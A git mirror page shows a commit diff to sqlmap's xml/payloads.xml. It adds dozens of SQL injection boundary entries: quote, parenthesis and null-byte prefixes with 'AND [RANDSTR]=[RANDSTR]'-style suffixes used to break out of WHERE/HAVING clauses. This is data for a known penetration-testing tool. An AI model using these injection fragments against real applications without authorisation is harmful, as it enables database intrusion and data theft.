mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-31 16:07:55 +03:00 
			
		
		
		
	Cleaning a leftover (deleted) made for Issue #564
This commit is contained in:
		
							parent
							
								
									cadbddd607
								
							
						
					
					
						commit
						178056968f
					
				
							
								
								
									
										273
									
								
								xml/payloads.xml
									
									
									
									
									
								
							
							
						
						
									
										273
									
								
								xml/payloads.xml
									
									
									
									
									
								
							|  | @ -229,6 +229,279 @@ Formats: | ||||||
| --> | --> | ||||||
| 
 | 
 | ||||||
| <root> | <root> | ||||||
|  |     <!-- Generic boundaries --> | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>1</ptype> | ||||||
|  |         <prefix>)</prefix> | ||||||
|  |         <suffix></suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>')</prefix> | ||||||
|  |         <suffix></suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1,2,3</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>'</prefix> | ||||||
|  |         <suffix></suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>5</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>4</ptype> | ||||||
|  |         <prefix>"</prefix> | ||||||
|  |         <suffix></suffix> | ||||||
|  |     </boundary> | ||||||
|  |     <!-- End of generic boundaries --> | ||||||
|  | 
 | ||||||
|  |     <!-- WHERE/HAVING clause boundaries --> | ||||||
|  |     <boundary> | ||||||
|  |         <level>1</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>1</ptype> | ||||||
|  |         <prefix>)</prefix> | ||||||
|  |         <suffix>AND ([RANDNUM]=[RANDNUM]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>1</ptype> | ||||||
|  |         <prefix>))</prefix> | ||||||
|  |         <suffix>AND (([RANDNUM]=[RANDNUM]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>1</ptype> | ||||||
|  |         <prefix>)))</prefix> | ||||||
|  |         <suffix>AND ((([RANDNUM]=[RANDNUM]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>1</level> | ||||||
|  |         <clause>0</clause> | ||||||
|  |         <where>1,2,3</where> | ||||||
|  |         <ptype>1</ptype> | ||||||
|  |         <prefix></prefix> | ||||||
|  |         <suffix></suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>1</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>')</prefix> | ||||||
|  |         <suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>'))</prefix> | ||||||
|  |         <suffix>AND (('[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>')))</prefix> | ||||||
|  |         <suffix>AND ((('[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>1</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>'</prefix> | ||||||
|  |         <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>3</ptype> | ||||||
|  |         <prefix>')</prefix> | ||||||
|  |         <suffix>AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>3</ptype> | ||||||
|  |         <prefix>'))</prefix> | ||||||
|  |         <suffix>AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>3</ptype> | ||||||
|  |         <prefix>')))</prefix> | ||||||
|  |         <suffix>AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>3</ptype> | ||||||
|  |         <prefix>'</prefix> | ||||||
|  |         <suffix>AND '[RANDSTR]' LIKE '[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>4</ptype> | ||||||
|  |         <prefix>")</prefix> | ||||||
|  |         <suffix>AND ("[RANDSTR]"="[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>4</ptype> | ||||||
|  |         <prefix>"))</prefix> | ||||||
|  |         <suffix>AND (("[RANDSTR]"="[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>4</ptype> | ||||||
|  |         <prefix>")))</prefix> | ||||||
|  |         <suffix>AND ((("[RANDSTR]"="[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>4</ptype> | ||||||
|  |         <prefix>"</prefix> | ||||||
|  |         <suffix>AND "[RANDSTR]"="[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>5</ptype> | ||||||
|  |         <prefix>")</prefix> | ||||||
|  |         <suffix>AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>5</ptype> | ||||||
|  |         <prefix>"))</prefix> | ||||||
|  |         <suffix>AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>5</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>5</ptype> | ||||||
|  |         <prefix>")))</prefix> | ||||||
|  |         <suffix>AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>5</ptype> | ||||||
|  |         <prefix>"</prefix> | ||||||
|  |         <suffix>AND "[RANDSTR]" LIKE "[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>2</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%')</prefix> | ||||||
|  |         <suffix>AND ('%'='</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>3</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%'))</prefix> | ||||||
|  |         <suffix>AND (('%'='</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%')))</prefix> | ||||||
|  |         <suffix>AND ((('%'='</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>1</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%'</prefix> | ||||||
|  |         <suffix>AND '%'='</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>5</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%00')</prefix> | ||||||
|  |         <suffix>AND ('[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|  |     <boundary> | ||||||
|  |         <level>4</level> | ||||||
|  |         <clause>1</clause> | ||||||
|  |         <where>1,2</where> | ||||||
|  |         <ptype>2</ptype> | ||||||
|  |         <prefix>%00'</prefix> | ||||||
|  |         <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix> | ||||||
|  |     </boundary> | ||||||
|  | 
 | ||||||
|     <boundary> |     <boundary> | ||||||
|         <level>1</level> |         <level>1</level> | ||||||
|         <clause>1</clause> |         <clause>1</clause> | ||||||
|  |  | ||||||
		Loading…
	
		Reference in New Issue
	
	Block a user